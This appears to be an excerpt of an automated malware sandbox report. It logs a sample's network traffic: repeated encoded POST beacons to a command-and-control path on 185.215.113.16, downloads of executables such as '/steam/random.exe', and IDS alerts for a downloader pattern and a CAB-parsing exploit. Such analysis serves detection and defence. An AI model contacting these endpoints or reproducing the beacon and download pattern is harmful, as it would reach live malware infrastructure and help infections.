Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.117.188.166 34.117.188.166
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49937 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49958 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49908
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0095CE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 8_2_0095CE44
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
